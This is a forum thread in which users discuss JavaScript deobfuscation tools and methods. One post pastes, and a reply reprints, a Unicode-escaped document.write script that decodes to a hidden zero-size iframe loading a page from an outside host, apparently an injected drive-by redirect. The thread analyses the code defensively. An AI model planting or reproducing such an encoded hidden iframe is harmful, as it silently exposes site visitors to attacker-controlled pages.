3 replies to this topic

[sjchansky]

i am looking for some level 2 java script deobfuscation tools. i have no problems running the java.js script using rhino or caffine monkey. i would like to find some other tools and or tutorials to help me deobfuscate the next level of java script or .exe files. Reverse engineering tools would also be helpful. All software MUST be legal.

steve

[extreme]

<html>
<head>
  <script language="JavaScript">
  <!--
	function decrypt(sBody)
	{
	  var sDecryptedBody = '';
	  //decrypt the body string here, e.g.:
	  for (var i=0; i<sBody.length; i++)
	  {
		var iChar = sBody.charCodeAt(i);

		if (iChar > 0)
		  sDecryptedBody += String.fromCharCode(iChar - 1);
		else
		  sDecryptedBody += String.fromCharCode(255);
	  }

	  return(sDecryptedBody);
	}

	function decode()
	{
	  var sCoded = document.getElementsByTagName('body')
[0].firstChild.data;

	  document.open();
	  document.write(decrypt(sCoded));
	  document.close();
	}
  //-->
  </script>
</head>
<body onload="decode();">
  <!-- Place the encrypted document here -->
</body>
</html>

Also:

http://code.gosu.pl/.../JsDecoder.html
http://hype-free.blo...javascript.html

and there are couple of more methods which my sleeping brain cannot remember of right now, but here is aprox.

document.write code into popup window, or use alert() instead of eval() or document.write() , or do something like this:
document .write("<a>");
<exploit code>

[bruxelles]

extreme can u tell me what obfuscating method is used in this code ?

<script type="text/javascript">document.write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0076\u0061\u006E\u0073\u0066\u006F\u0072\u0073\u0061\u006C\u0065\u0069\u006E\u0065\u0073\u0073\u0065\u0078\u002E\u0063\u006F\u002E\u0075\u006B\u002F\u006D\u0065\u0064\u0069\u0061\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');</script>

[webdevil]

That looks like plain hex
3C = <
49 = i
46= f
52= r
41= a
So that should be an iframe in your site.

and simply replacing the document.write with an alert will get you what that is

<script type="text/javascript">alert('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0076\u0061\u006E\u0073\u0066\u006F\u0072\u0073\u0061\u006C\u0065\u0069\u006E\u0065\u0073\u0073\u0065\u0078\u002E\u0063\u006F\u002E\u0075\u006B\u002F\u006D\u0065\u0064\u0069\u0061\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');</script>